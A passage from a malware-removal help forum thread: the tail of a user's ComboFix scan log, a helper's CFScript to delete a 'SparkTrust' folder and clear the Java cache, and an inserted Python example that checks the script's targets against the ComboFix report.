2014-01-29 22:56 . 2014-01-29 22:56 147968 ----a-w- c:\windows\system32\occache.dll
2014-01-29 22:56 . 2014-01-29 22:56 13824 ----a-w- c:\windows\system32\mshta.exe
2014-01-29 22:56 . 2014-01-29 22:56 774144 ----a-w- c:\windows\system32\jscript.dll
2014-01-29 22:56 . 2014-01-29 22:56 83968 ----a-w- c:\windows\system32\MshtmlDac.dll
2014-01-29 22:56 . 2014-01-29 22:56 48128 ----a-w- c:\windows\system32\imgutil.dll
2014-01-29 22:56 . 2014-01-29 22:56 135680 ----a-w- c:\windows\system32\iepeers.dll
2014-01-29 07:53 . 2014-01-29 07:53 9728 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 9728 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 5632 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 5632 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-ole32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 5632 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 5632 ---ha-w- c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 4096 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-user32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 4096 ---ha-w- c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 3584 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-advapi32-l2-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 3072 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-version-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 3072 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-shell32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 3072 ---ha-w- c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 3072 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 2560 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 522752 ----a-w- c:\windows\system32\XpsGdiConverter.dll
2014-01-29 07:53 . 2014-01-29 07:53 364544 ----a-w- c:\windows\SysWow64\XpsGdiConverter.dll
2014-01-29 07:53 . 2014-01-29 07:53 3584 ---ha-w- c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 2776576 ----a-w- c:\windows\system32\msmpeg2vdec.dll
2014-01-29 07:53 . 2014-01-29 07:53 2560 ---ha-w- c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 2284544 ----a-w- c:\windows\SysWow64\msmpeg2vdec.dll
2014-01-29 07:53 . 2014-01-29 07:53 1682432 ----a-w- c:\windows\system32\XpsPrint.dll
2014-01-29 07:53 . 2014-01-29 07:53 1158144 ----a-w- c:\windows\SysWow64\XpsPrint.dll
2014-01-29 07:53 . 2014-01-29 07:53 10752 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 10752 ---ha-w- c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 604160 ----a-w- c:\windows\SysWow64\d3d10level9.dll
2014-01-29 07:53 . 2014-01-29 07:53 363008 ----a-w- c:\windows\system32\dxgi.dll
2014-01-29 07:53 . 2014-01-29 07:53 249856 ----a-w- c:\windows\SysWow64\d3d10_1core.dll
2014-01-29 07:53 . 2014-01-29 07:53 220160 ----a-w- c:\windows\SysWow64\d3d10core.dll
2014-01-29 07:53 . 2014-01-29 07:53 207872 ----a-w- c:\windows\SysWow64\WindowsCodecsExt.dll
2014-01-29 07:53 . 2014-01-29 07:53 1643520 ----a-w- c:\windows\system32\DWrite.dll
2014-01-29 07:53 . 2014-01-29 07:53 161792 ----a-w- c:\windows\SysWow64\d3d10_1.dll
2014-01-29 07:53 . 2014-01-29 07:53 1247744 ----a-w- c:\windows\SysWow64\DWrite.dll
2014-01-29 07:53 . 2014-01-29 07:53 1175552 ----a-w- c:\windows\system32\FntCache.dll
2014-01-29 07:53 . 2014-01-29 07:53 1080832 ----a-w- c:\windows\SysWow64\d3d10.dll
2014-01-29 07:53 . 2014-01-29 07:53 296960 ----a-w- c:\windows\system32\d3d10core.dll
2014-01-29 07:53 . 2014-01-29 07:53 1238528 ----a-w- c:\windows\system32\d3d10.dll
2014-01-29 07:53 . 2014-01-29 07:53 333312 ----a-w- c:\windows\system32\d3d10_1core.dll
2014-01-29 07:53 . 2014-01-29 07:53 245248 ----a-w- c:\windows\system32\WindowsCodecsExt.dll
2014-01-29 07:53 . 2014-01-29 07:53 194560 ----a-w- c:\windows\system32\d3d10_1.dll
2014-01-29 07:53 . 2014-01-29 07:53 648192 ----a-w- c:\windows\system32\d3d10level9.dll
2014-01-29 07:53 . 2014-01-29 07:53 293376 ----a-w- c:\windows\SysWow64\dxgi.dll
2014-01-29 07:53 . 2014-01-29 07:53 221184 ----a-w- c:\windows\system32\UIAnimation.dll
2014-01-29 07:53 . 2014-01-29 07:53 187392 ----a-w- c:\windows\SysWow64\UIAnimation.dll
2014-01-25 22:46 . 2009-07-14 02:36 175616 ----a-w- c:\windows\system32\msclmd.dll
2014-01-25 22:46 . 2009-07-14 02:36 152576 ----a-w- c:\windows\SysWow64\msclmd.dll
2014-01-21 01:03 . 2010-06-24 01:33 22240 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1AMPCBOK]
@="{04cd1f3e-81d5-4904-a3ab-e0f99a7d769d}"
[HKEY_CLASSES_ROOT\CLSID\{04cd1f3e-81d5-4904-a3ab-e0f99a7d769d}]
2010-11-05 01:58 297808 ----a-w- c:\windows\System32\mscoree.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"StartCCC"="c:\program files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2009-09-08 98304]
"AVG_UI"="c:\program files (x86)\AVG\AVG2014\avgui.exe" [2013-11-07 4956176]
"APSDaemon"="c:\program files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2013-09-13 59720]
"EEventManager"="c:\program files (x86)\Epson Software\Event Manager\EEventManager.exe" [2009-12-03 976320]
"AvastUI.exe"="c:\program files\AVAST Software\Avast\AvastUI.exe" [2014-03-15 3767096]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\windows]
"LoadAppInit_DLLs"=1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\drivers32]
"aux"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ    sasnative64\0autocheck autochk *
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\run-]
"Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
"iTunesHelper"="c:\program files (x86)\iTunes\iTunesHelper.exe"
.
R2 AVGIDSAgent;AVGIDSAgent;c:\program files (x86)\AVG\AVG2014\avgidsagent.exe;c:\program files (x86)\AVG\AVG2014\avgidsagent.exe [x]
R2 BBSvc;Bing Bar Update Service;c:\program files (x86)\Microsoft\BingBar\BBSvc.EXE;c:\program files (x86)\Microsoft\BingBar\BBSvc.EXE [x]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 PCDSRVC{F36B3A4C-F95654BD-06000000}_0;PCDSRVC{F36B3A4C-F95654BD-06000000}_0 - PCDR Kernel Mode Service Helper Driver;c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms;c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
S0 aswRvrt;avast! Revert; [x]
S0 aswVmm;avast! VM Monitor; [x]
S0 AVGIDSHA;AVGIDSHA;c:\windows\system32\DRIVERS\avgidsha.sys;c:\windows\SYSNATIVE\DRIVERS\avgidsha.sys [x]
S0 Avgloga;AVG Logging Driver;c:\windows\system32\DRIVERS\avgloga.sys;c:\windows\SYSNATIVE\DRIVERS\avgloga.sys [x]
S0 Avgmfx64;AVG Mini-Filter Resident Anti-Virus Shield;c:\windows\system32\DRIVERS\avgmfx64.sys;c:\windows\SYSNATIVE\DRIVERS\avgmfx64.sys [x]
S0 Avgrkx64;AVG Anti-Rootkit Driver;c:\windows\system32\DRIVERS\avgrkx64.sys;c:\windows\SYSNATIVE\DRIVERS\avgrkx64.sys [x]
S1 aswKbd;aswKbd;c:\windows\system32\drivers\aswKbd.sys;c:\windows\SYSNATIVE\drivers\aswKbd.sys [x]
S1 aswNdisFlt;Avast! Firewall Driver;c:\windows\system32\DRIVERS\aswNdisFlt.sys;c:\windows\SYSNATIVE\DRIVERS\aswNdisFlt.sys [x]
S1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys;c:\windows\SYSNATIVE\drivers\aswSnx.sys [x]
S1 aswSP;aswSP;c:\windows\system32\drivers\aswSP.sys;c:\windows\SYSNATIVE\drivers\aswSP.sys [x]
S1 Avgdiska;AVG Disk Driver;c:\windows\system32\DRIVERS\avgdiska.sys;c:\windows\SYSNATIVE\DRIVERS\avgdiska.sys [x]
S1 AVGIDSDriver;AVGIDSDriver;c:\windows\system32\DRIVERS\avgidsdrivera.sys;c:\windows\SYSNATIVE\DRIVERS\avgidsdrivera.sys [x]
S1 Avgldx64;AVG AVI Loader Driver;c:\windows\system32\DRIVERS\avgldx64.sys;c:\windows\SYSNATIVE\DRIVERS\avgldx64.sys [x]
S1 Avgtdia;AVG TDI Driver;c:\windows\system32\DRIVERS\avgtdia.sys;c:\windows\SYSNATIVE\DRIVERS\avgtdia.sys [x]
S2 ABBYY.Licensing.FineReader.Sprint.9.0;ABBYY FineReader 9.0 Sprint Licensing Service;c:\program files (x86)\Common Files\ABBYY\FineReaderSprint\9.00\Licensing\NetworkLicenseServer.exe;c:\program files (x86)\Common Files\ABBYY\FineReaderSprint\9.00\Licensing\NetworkLicenseServer.exe [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 aswMonFlt;aswMonFlt;c:\windows\system32\drivers\aswMonFlt.sys;c:\windows\SYSNATIVE\drivers\aswMonFlt.sys [x]
S2 avast! Firewall;avast! Firewall;c:\program files\AVAST Software\Avast\afwServ.exe;c:\program files\AVAST Software\Avast\afwServ.exe [x]
S2 avgwd;AVG WatchDog;c:\program files (x86)\AVG\AVG2014\avgwdsvc.exe;c:\program files (x86)\AVG\AVG2014\avgwdsvc.exe [x]
S2 BBUpdate;BBUpdate;c:\program files (x86)\Microsoft\BingBar\SeaPort.EXE;c:\program files (x86)\Microsoft\BingBar\SeaPort.EXE [x]
S2 cvhsvc;Client Virtualization Handler;c:\program files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE;c:\program files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE [x]
S2 EPSON_EB_RPCV4_04;EPSON V5 Service4(04);c:\program files\Common Files\EPSON\EPW!3 SSRP\E_S50STB.EXE;c:\program files\Common Files\EPSON\EPW!3 SSRP\E_S50STB.EXE [x]
S2 EPSON_PM_RPCV4_04;EPSON V3 Service4(04);c:\program files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE;c:\program files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE [x]
S2 MBAMScheduler;MBAMScheduler;c:\program files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe;c:\program files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [x]
S2 MBAMService;MBAMService;c:\program files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe;c:\program files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [x]
S2 sftlist;Application Virtualization Client;c:\program files (x86)\Microsoft Application Virtualization Client\sftlist.exe;c:\program files (x86)\Microsoft Application Virtualization Client\sftlist.exe [x]
S2 TuneUp.UtilitiesSvc;AVG PC TuneUp Service;c:\program files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe;c:\program files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe [x]
S3 aswStm;aswStm;c:\windows\system32\drivers\aswStm.sys;c:\windows\SYSNATIVE\drivers\aswStm.sys [x]
S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys;c:\windows\SYSNATIVE\drivers\mbam.sys [x]
S3 Sftfs;Sftfs;c:\windows\system32\DRIVERS\Sftfslh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftfslh.sys [x]
S3 Sftplay;Sftplay;c:\windows\system32\DRIVERS\Sftplaylh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftplaylh.sys [x]
S3 Sftredir;Sftredir;c:\windows\system32\DRIVERS\Sftredirlh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftredirlh.sys [x]
S3 Sftvol;Sftvol;c:\windows\system32\DRIVERS\Sftvollh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftvollh.sys [x]
S3 sftvsa;Application Virtualization Service Agent;c:\program files (x86)\Microsoft Application Virtualization Client\sftvsa.exe;c:\program files (x86)\Microsoft Application Virtualization Client\sftvsa.exe [x]
S3 TuneUpUtilitiesDrv;TuneUpUtilitiesDrv;c:\program files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys;c:\program files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys [x]
.
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-03-19 22:03 1150280 ----a-w- c:\program files (x86)\Google\Chrome\Application\33.0.1750.154\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-03-24 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-02-06 21:17]
.
2014-03-24 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-01-20 09:40]
.
2014-03-24 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-01-20 09:40]
.
2014-01-20 c:\windows\Tasks\PCDRScheduledMaintenance.job
- c:\program files\PC-Doctor for Windows\pcdrcui.exe [2009-09-18 07:11]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00avast]
@="{472083B0-C522-11CF-8763-00608CC02F24}"
[HKEY_CLASSES_ROOT\CLSID\{472083B0-C522-11CF-8763-00608CC02F24}]
2014-03-15 23:06 287280 ----a-w- c:\program files\AVAST Software\Avast\ashShA64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1AMPCBOK]
@="{04cd1f3e-81d5-4904-a3ab-e0f99a7d769d}"
[HKEY_CLASSES_ROOT\CLSID\{04cd1f3e-81d5-4904-a3ab-e0f99a7d769d}]
2010-11-05 01:57 444752 ----a-w- c:\windows\System32\mscoree.dll
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local
IE: E&xport to Microsoft Excel - c:\progra~2\MICROS~1\Office12\EXCEL.EXE/3000
TCP: DhcpNameServer = 192.168.0.1
FF - ProfilePath - c:\users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\
FF - prefs.js: browser.search.selectedEngine - Google
FF - prefs.js: browser.startup.homepage - hxxp://www.google.com/firefox
FF - prefs.js: keyword.URL - hxxp://www.google.com/search?ie=UTF-8&oe=utf-8&q=
.
- - - - ORPHANS REMOVED - - - -
.
BHO-{13070af0-bc6c-4185-8baa-40a4cf05b323} - (no file)
BHO-{497c088e-1b2a-43fe-8431-d5d257f37546} - (no file)
ShellIconOverlayIdentifiers-{4d87b7a7-23f1-470c-aa45-96b25b9bd138} - (no file)
Wow6432Node-HKLM-Run-<NO NAME> - (no file)
Wow6432Node-HKU-Default-RunOnce-SPReview - c:\windows\System32\SPReview\SPReview.exe
HKLM_Wow6432Node-ActiveSetup-{2D46B6DC-2207-486B-B523-A557E6D54B47} - start
ShellIconOverlayIdentifiers-{4d87b7a7-23f1-470c-aa45-96b25b9bd138} - (no file)
.
.
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PCDSRVC{F36B3A4C-F95654BD-06000000}_0]
"ImagePath"="\??\c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-1730965262-3147105662-1425472414-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.eml\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="WindowsLiveMail.Email.1"
.
[HKEY_USERS\S-1-5-21-1730965262-3147105662-1425472414-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vcf\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="WindowsLiveMail.VCard.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil10c.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\LocalServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\FlashUtil10c.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10c.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.10"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10c.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10c.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10c.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}]
@Denied: (A 2) (Everyone)
@="IFlashBroker3"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-03-25  09:14:44
ComboFix-quarantined-files.txt  2014-03-24 23:14
.
Pre-Run: 652,611,481,600 bytes free
Post-Run: 652,166,672,384 bytes free
.
- - End Of File - - 328B06046D416BD74D516EF1ADB36626
B408478238977884445221DD3C0F0326
 



#11 gringo_pr


    Bleepin Gringo


  • Malware Response Team
  • 136,772 posts
  • Gender:Male
  • Location:Puerto rico

Posted 25 March 2014 - 08:55 AM


Hello Paulie67

At this time I would like you to run this script for me and it is a good time to check out the computer to see if there is anything else that needs to be addressed.

:Run CFScript:

Please start by opening Notepad and copy/paste the text in the box into the window:

ClearJavaCache::

Folder::
c:\program files (x86)\Common Files\SparkTrust
 
Save it to your desktop as CFScript.txt

Referring to the picture above, drag CFScript.txt into ComboFix.exe
[image: CFScriptB-4.gif]
This will let ComboFix run again.
Restart if you have to.
Save the produced logfile to your desktop.

Note: Do not mouseclick ComboFix's window whilst it's running. That may cause it to stall.

Note 2: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion.", please restart the computer.

"information and logs"
  • In your next post I need the following
    • report from Combofix
    • let me know of any problems you may have had
    • How is the computer doing now after running the script?
Gringo
I Close My Topics If You Have Not Replied In 5 Days If You Will Be Longer Please Let Me Know

If I Have Not Replied To One Of My Topics In 48 Hrs Please Bump The Topic



My help is free, however, if you wish to make a small donation to show your appreciation or to help me continue the fight against Malware, then click here --> [image: btn_donate_SM.gif] <-- Don't worry, every little bit helps.

Proud Graduate Of Malware Removal University
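The post above asks for a CFScript with a `Folder::` directive and then for the report ComboFix produces. The following is an added example, not ComboFix code and not from either poster: it parses a CFScript.txt and a ComboFix report of the `((( Section )))` layout seen in this thread and checks that every `Folder::`/`File::` target shows up under "Other Deletions", which is the check a helper does by eye when the log comes back. The CFScript and report excerpt embedded below are constructed after the ones posted here.

```python
"""Cross-check a ComboFix CFScript against the report ComboFix produced.

Added example for this thread (not part of ComboFix or the original posts).
Given the CFScript.txt text and the report written afterwards, confirm that
every path listed under a ``Folder::`` or ``File::`` directive appears in the
report's "Other Deletions" section.  The ``((((( Name )))))`` section headers
and the ``Directive::`` layout follow the posts in this thread; the sample
data below is constructed, not copied from a live machine.
"""
import re
from typing import Dict, List, Optional

# Constructed CFScript, same shape as the one the helper asked for.
SAMPLE_CFSCRIPT = """ClearJavaCache::

Folder::
c:\\program files (x86)\\Common Files\\SparkTrust
"""

# Constructed excerpt of a ComboFix report run with that script.
SAMPLE_REPORT = """ComboFix 14-03-24.01 - Paulette 26/03/2014 15:38:36.2.4 - x64
Command switches used :: c:\\users\\Paulette\\Desktop\\CFScript.txt
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\\program files (x86)\\Common Files\\SparkTrust
c:\\program files (x86)\\Common Files\\SparkTrust\\UUS3\\Update3.exe
c:\\program files (x86)\\Common Files\\SparkTrust\\UUS3\\UUS3.dll
.
.
((((((((((((((((((((((((( Files Created from 2014-02-26 to 2014-03-26 )))))))))))))))))))))))))))))))
.
.
2014-03-26 06:25 . 2014-03-26 06:25 -------- d-----w- c:\\users\\Guest\\AppData\\Local\\temp
"""

# A ComboFix section header is a run of '(' , the title, and a run of ')'.
SECTION_HEADER = re.compile(r"^\(+\s*(.*?)\s*\)+\s*$")
# A CFScript directive is a bare word followed by '::' on its own line.
DIRECTIVE = re.compile(r"^([A-Za-z]+)::\s*$")


def parse_cfscript(text: str) -> Dict[str, List[str]]:
    """Map each ``Directive::`` to the non-empty lines that follow it."""
    directives: Dict[str, List[str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        m = DIRECTIVE.match(line)
        if m:
            current = m.group(1)
            directives.setdefault(current, [])
        elif line and current is not None:
            directives[current].append(line)
    return directives


def parse_report_sections(text: str) -> Dict[str, List[str]]:
    """Split a ComboFix report into its ``((( Name )))`` sections.

    Lines consisting only of '.' are ComboFix's spacer lines and are dropped;
    text before the first header is kept under the key 'Header'.
    """
    sections: Dict[str, List[str]] = {"Header": []}
    current = "Header"
    for raw in text.splitlines():
        line = raw.rstrip()
        m = SECTION_HEADER.match(line)
        if m:
            current = m.group(1)
            sections.setdefault(current, [])
            continue
        if line.strip() in ("", "."):
            continue
        sections[current].append(line)
    return sections


def verify_deletions(cfscript: str, report: str) -> Dict[str, bool]:
    """For each Folder::/File:: target, say whether the report lists it as deleted.

    The comparison is case-insensitive: Windows paths are, and ComboFix
    lower-cases parts of paths in its own output.
    """
    directives = parse_cfscript(cfscript)
    deleted = {p.lower() for p in parse_report_sections(report).get("Other Deletions", [])}
    results: Dict[str, bool] = {}
    for key in ("Folder", "File"):
        for target in directives.get(key, []):
            results[target] = target.lower() in deleted
    return results


def unresolved_targets(cfscript: str, report: str) -> List[str]:
    """Targets the script asked for that the report never shows as deleted."""
    return [t for t, ok in verify_deletions(cfscript, report).items() if not ok]


if __name__ == "__main__":
    for target, ok in verify_deletions(SAMPLE_CFSCRIPT, SAMPLE_REPORT).items():
        print(("DELETED   " if ok else "NOT FOUND ") + target)
    print("Unresolved:", unresolved_targets(SAMPLE_CFSCRIPT, SAMPLE_REPORT))
```

A non-empty `unresolved_targets` list means the folder is still present (or was renamed) and the next script or a manual check is needed.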

#12 Paulie67

  • Topic Starter

  • Members
  • 12 posts
  • Gender:Female
  • Location:Sunshine Coast, QLD

Posted 26 March 2014 - 03:26 AM

ComboFix 14-03-24.01 - Paulette 26/03/2014 15:38:36.2.4 - x64
